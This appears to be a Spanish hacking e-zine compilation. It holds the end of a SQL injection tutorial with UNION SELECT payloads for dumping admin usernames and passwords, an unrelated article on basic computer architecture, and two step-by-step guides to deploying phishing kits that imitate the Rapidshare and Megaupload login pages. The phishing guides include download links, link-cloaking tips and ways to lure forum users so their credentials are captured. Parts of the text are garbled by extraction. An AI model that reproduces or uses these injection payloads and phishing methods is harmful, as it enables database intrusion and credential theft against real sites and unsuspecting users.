A mí me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente:
Borras +information_schema.tables+3,1-- , quedara a si:
www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,table_name,5,6,7+from
y pones +admin , pones admin por que es la tabla importante que te ha tirado,
quedaría así:
www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin
& ara en table_name hay que ir probando palabras como; “Login, admin,
password, clave, pass, user, email, mail , etc... “ Quedaría a si:
www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,admin,5,6,7+from+admin
A mí el user me lo ha tirado en “admin” y la contraseña en “clave”. Ahora borras
lo que has puesto en 4, y pones :
concat(nombre,0x3a3a,pass)
Quedaría a si:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,
concat(admin,0x3a3a,clave),5,6,7+from+admin
Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: en
hexadecimal y clave es la tabla donde nos a tirado el password.
Y Listo ya tenemos usuario y password. Ahora toca buscar el panel que para mí
es lo más difícil :P
Hasta aquí hemos llegado amigos, mucha suerte y cuidaros, nos vemos por
www.level-23.com
Autor : eDeex_
ARQUITECTURA BÁSICA DE UN PC
(COMPUTADOR)
Saludos lectores, desde level-23 me place escribirles :P
Antes de nada, quiero avisarles que si no les gusta el mundo de la informática
(no creo que sea este el caso jeje) no van a poder resistir este articulo, ya que
es casi 100% teórico (cosa que a casi todos, incluido yo, nos suele aborrecer).
Empecemos con el cacao…muchos de vosotros programareis, otro tantos
queréis aprender a programar, pero la mayoría de vosotros programareis sin
saber qué es lo que hace un PC, como funciona por dentro (no voy a explicar
que un PC tiene una placa base, un procesador, memorias RAM, discos duros
etc..eso supongo que lo sabes de serie xD) y esa es una de las claves para
programar bien y para que programar sea más sencillo ;).
Bueno, desde tiempo memorables (yo aun no había nacido xD), concretamente
el año 1945 los ordenadores funcionan básicamente estos elementos:
-
CPU (Procesador): controlar y ejecutar todas las funciones de un PC
Memoria: su principal función es la de almacenar datos y código
(programas)
BUS de comunicaciones: se encarga de operaciones de transferencia
principalmente
Dispositivos de E/S: dispositivos de entrada/salida
Ahora pasaré a explicar, en un orden para que todo sea comprensible y podáis
unir lazos entre conceptos, los anteriores elementos.
1-Memoria:
2- BUS de comunicaciones:
La palabra BUS (lejos de referirse al peor presidente de la historia de los EEUU
jeje), nos puede recordar a el transporte público, no estamos mal encaminados,
pues esta es la función principal de el BUS, transportar operaciones. Tenemos 3
tipos de buses fundamentales:
-
BUS de Datos: transporta entre procesador, memoria y/o discos duros
DATOS.
BUS de Control: transporta información de control para un buen
funcionamiento de los elementos del PC.
BUS de Direcciones: transporta la dirección virtual (dirección en memoria)
donde se tiene que acceder.
3- Dispositivos E/S:
E(entrada); S(salida) son los periféricos, pueden funcionar de 3 maneras:
E/S programada: el periférico realiza su operación mientras la CPU está
100% en ese periférica hasta que no termina su operación.
- E/S por interrupciones: el procesador se ocupa al principio de la
operación del periférico y luego se dedica a otras cosas, hasta que el
periférico termina y el mismo procesador vuelve con el periférico para
realizar la operación.
E/S mediante DMA: la memoria virtual se sitúa sobre el periférico, lo cual libera
al procesador de la tarea de control y de estar presente en la transferencia de
datos.
-
Os pongo una tabla básica de referencia en operaciones lógicas
O
P
1
0
OP R
2
E
S
U
0
AN
D
OR
XO
R
0
0
0
0
1
0
1
0
1
L
T
D
O
0
0
1
1
1
1
1
1
0
Pasemos a ver la unidad de registros (registros…ummm, os acordáis de algo??)
UNIDAD DE REGISTROS: tachán!!!! Registros, aquel eslabón mas alto en la
pirámide de memoria, de más rápido proceso y acceso pero de menos
capacidad, ahora vamos a explicar básicamente que son y cómo funcionan :P
Las unidades de registros permiten al procesador estar libre de acceder
siempre a memoria, y acceder a ellas más rápidamente, pero tienen en contra el
que tienen muy poca capacidad (los que más usaremos son de 32 bits, pero hay
de 64, de 16, etc.).
Tenemos dos tipos de registros:
-
Registros de propósito general:
el programador los puede utilizar para almacenar datos, direcciones, etc.
es decir, este tipo de registros son accesible al programador. En
Ensamblador será frecuente su uso (EAX, EBX, etc.).
-
Registros de propósito específico:
el programador no puede hace uso de ellos como hacía con los de
propósito general, son usados por la CPU, en concreto por la Unidad de
Control.
Algunos ejemplos son:
 IR: registro de instrucción
 PC: contiene la dirección de la próxima línea de código que se
ejecutará
 SR: indica el estado de alguna característica de la CPU
 MAR: comunica la CPU con el bus externo
 MDR: comunica la CPU con el bus de datos
 Como podemos ver en la imagen, los registros del micro son los
más rápidos, pero los que menos capacidad tienen; en cambio, la
memoria secundaria (discos duros, etc.…) es la más lenta pero la
que más capacidad de almacenamiento tiene. Entre estos dos nivel
tenemos la memoria caché y la memoria principal (RAM).
 El procesador se encarga de decidir qué información va a los
niveles superiores (información que queremos que se procese
rápido) pero tarde o temprano, lo que se aloja en los niveles
superiores, al perder importancia baja a eslabones más bajos (por
que pueden alojar más espacio).
 Bueno, ahora vamos a explicar una concepto que a la mayoría os
sonará y que es parte fundamental de los sistemas operativos:






La Memoria Virtual: trata los dos niveles inferiores (memoria
principalRAM y memoria secundaria Discos duros) como uno
solo.
Todos los programas que ejecutamos, se alojan en un espacio
virtual independiente, que, mediante el control de la CPU y del SO,
no comparte con ningún otro programa.
Todo el espacio virtual se divide en páginas virtuales de 4Kb que se
estructuran en una tabla de páginas, que nos indicará donde están
alojadas las páginas virtuales, en la memoria principal o en la
secundaria.
NOTA: todo programa, para ser ejecutado, necesita primero ser
cargado en la memoria principal (RAM).


Página 1
Página 2
DISCO DURO
Página 3
Página 4
Página 5
Página 6
RAM
Página 7

 Bueno, llegados aquí, varios habrán abandonado ya, para los que
hayan resistido el primer asedio, ara viene el segundo!! xD
...
Ahora toca uno de los platos fuertes…
4- Microprocesador (CPU):
La CPU es la que ejecuta todos los cálculos y se encarga de controlar todo lo
ocurrido, es decir, es el componente central del equipo (CPUUnidad Central
de Procesos).
Consta de 3 partes fundamentales: la ALU, las unidades de registros y la unidad
de control.
Paso a explicaros estas tres partes básicas de la CPU:
ALU: su nombre es Unidad Aritmético-Lógica, y como su nombre indica es la
encargada de realizar operaciones aritméticas (suma, resta, división, etc…) y
operaciones lógicas (AND,OR,XOR,NOT…).
Supongo que todo el mundo sabrá lo que son las operaciones aritméticas (se
estudian en la escuela, o por lo menos se intenta xD), las que puede que no
conozcáis son las operaciones lógicas.
Estas son básicamente:
-
AND: hecho a dos bits (1 o 0) devuelve 1 si los dos bits son 1
OR: devuelve 1 si uno de los bits es 1
XOR: da uno de los dos bits si uno es 1 y el otro 0
NOT: solo trabaja con un operando, lo invierte, por ejemplo, de 0 a 1.
UNIDAD DE CONTROL: estructura la ejecución de el código, es decir,
CONTROLA la ejecución de la instrucción actual (IR) y obtiene la siguiente (PC).
Regula el funcionamiento de la CPU.
Cuando decimos controlar decimos que sigue este proceso (así por encima):
- Cuando ejecutamos una instrucción, la unidad de control la analizará y
nos “dirá” qué hacer con ella y donde debe ser enviada para su proceso.
Bueno, bueno, bueno, con esto ya tendréis mareo garantizado para un buen rato
jejej
Si queréis investigar no dudéis en preguntarlo, pero antes: “Google is your
friend” ;)
Aquí doy por terminado el artículo este que os introducirá o os aclarará el:
“cómo funciona una computadora?” y os dará vía libre para probar nuevas
cosas :P
Imagen sacada de google
Autor : Habor
Manual Phiser Rapidshare 2009
Primero que nada debemos tener un hosting para alojar los archivos del
fake,aqui algunos free
www.justfree.com
http://www.blackapplehost.com
http://www.000webhost.com/
Rapidshare Phisher by piejustice v1.3
http://www.megaupload.com/?d=I8JL55JA
Password level-23.com
Bien una vez descargado el paquete subimos todos los archivos al hosting
Ahora editamos el rs_pie_conf.php esta parte
La primera linea es para guardar los datos de las cuentas con mas de 10000
puntos (pueden cambiar el nombre del archivo .html)
La segunda linea es para guardar los datos de las cuentas con menos de 10000
puntos (pueden cambiar el nombre del archivo .html)
La tercera linea es la pass que nos pedira para entrar en el admin y borrar links
u otras cosas (pueden cambiar el nombre )
La cuarta linea es el security lock de rapidshare mas adelante veremos para
que es y si lo quieren tener true o false (pueden cambiar el nombre )
Bien,explicado esto vamos a crear los links para eso entramos en el admin.php
en mi caso sera
http://www.level-23.com/test/admin.php
Vamos a Links Panel y ponemos Create Links le damos a Go! Aqui nos saldra
una ventana para colocar los links originales de rapidshare los pegamos asi
Le damos a Create y tendremos estos links ya modificados con nuestro hosting
Estos links ya son los buenos para poder camuflarlos con el
http://urlteam.org
O esta otra
http://lix.in
La pagina fake sera asi
Y la otra de premium sera asi
Voy hacer la preuba a ver si captura los datos xD
Para ver los datos capturados vamos al panel de admin y en Passwords Panel
ponemos View Passwords List y le damos Go!
Nos pedira la password que cambiamos al principio
Pues si funciona perfecto,ahora vamos a ver que es lo que sale una vez
introducidos los datos para descargar el link
Es para que nos regalen su unlock code si lo ponen saldra asi tambien
Account is Locked
PIN = 123654789
Y ya esta es bien facil,para que esto funcione bien y se piquen los usuarios deben de
crear post reales con el primer link de fake,me refiero a post con explicacion +
imagenes para que parezca de verdad real,ya que si ponen los datos bien se les
redirecciona a la pagina real de rapidshare para poder desxcargar el archivo real asi
no se dan ni cuenta de pasaron por un fake al principo
Autor : Xtazis
Manual Phiser Megaupload 2009
Esta claro que primero tienen que tener un hosting para poder alojar los
archivos descargados,este paso lo salto ya que seguro que lo saben
hacer,sirve cualquier hosting si no tiene publicidad mucho mejor ya que si no
nadie picara.
Nos descargamos el Phiser desde aqui
http://www.megaupload.com/?d=XHJDZIME
Pass: level-23.com
Subimos los archivos al hosting
Bien,ahora nos guiaremos por este link ya creado solo tenemos que modificarlo
a nuestro gusto para que parezca real ;la descargar
http://www.level23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.
By.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIU
Este ya esta preparado por m'i con los datos que le puse para hacer este
manual,lo primero que tienen que hacer es buscarse una pelicula o algun juego
que sean nuevos,digo esto por que para que la gente que tienen premium pique
la descarga debe de ser de bastantes links si solo ponen uno nadie picara eso
esta claro.Por ejemplo voy a modificar ese mismo link otra vez para que puedan
ver como se hace,primero buscamos una descarga como ya he dicho yo usare
esta
No hace falta que copien todos los links sino quieren solo es para sacarle los
datos y que parezca real...
Cogeremos el primer link de megaupload y lo ponemos en el navegador
Estos son los datos reales ahora vamos a crear el link fake con estos mismos
datos pero la url de nuestro hosting,como pueden ver estan las tres lineas
numeradas 1,2,3,copiamos el link al bloc de notas
/?file_name=TBB1988.x264.m-hdhttp://www.level-23.com/test/?file_name=TBB1988.x264.m-hdhttp://www.level-23.com/test/?file_name=
www.mhd-hdhieu.com
&file_size=
95.78
tom.720p.part0..rar &file_description=
&file_description=www.mhd-hdhieu.com
www.mhd-hdhieu.com&file_size=
&file_size=95.78
%20MB&downloadID=UU4MWIIU
MB%20MB&downloadID=UU4MWIIU
MB
El color verde sera la ruta de nuestro hosting
El color rojo sera el nombre que copiaremos de la descarga real
El color rosa sera la descripcion del archivo
El azul sera el tamano de la descarga
Ya tenemos el link del phiser creado ahora vamos a probarlo
Esa es la pagina fake que vera las victimas,voy a probar a ver si captura los
datos,entran en el Login
Y ahora para pder ver los datos capturados solo ponemos esto en el navegador
http://www.level-23.com/test/grabbed.html
http://www.level-23.com/test/grabbed.html
La rojo es su hosting xD
Ya tenemos los datos del primer inocente xD...ahora para camuflar la url
nuestra y que parezca mas real ya que si ven un url sospechosa como la mia
Nadie descargara y borraran el post en 2 minutos,para camuflar la url podemos
usar esta pagina
http://urlteam.org
O esta otra
http://lix.in/
Tienen que poner los links tal cual esta el fake
Link fake
http://www.level-23.com/test/?file_name=TBB1988.x264.m-hdtom.720p.part0..rar &file_description=www.mhd-hdhieu.com&file_size=95.78
MB%20MB&downloadID=UU4MWIIU
Link Fake camuflado
http://lix.in/-542849
Ahora vamos a entrar en ese link fake
Esta perfecto para dejarlo en algun foro,tendran que hacer eso mismo con 7 o 8
links para que parezca real la descarga de la pelicula o juego,voy a probralo a
ver si aun captura los datos con esta url camuflada
Va perfecto es asi de sencillo y rapido...
Autor : Xtazis
Gracias a todos por participar
Manual Esteganograf
Esteganografíía (Shevchenko)
Manual xul (Shevchenko)
top
Intrusion a un Router Mediante Telnet (S
(Stop
top))
Instalar UbuntuStudio (UnknownShadow)
Telnet y ssh (The JokeR)
XSS TUNELING (Max p0wer ”frozenfew
frozenfew””)
Introducción a XSS (Max p0wer ”frozenfew
Introducció
frozenfew””)
ón en HTML y CSS (Ghost)
Curso Básico de Programaci
Programació
Manual Inyeccion Sql (eDeex_)
Arquitectura de Computadores (Habor)
Manual Phiser Rapidshare 2009 (xtazis
xtazis))
Manual Phiser Megaupload 2009 (xtazis
xtazis))
www.level-23.com
Hack Tools

Documentos relacionados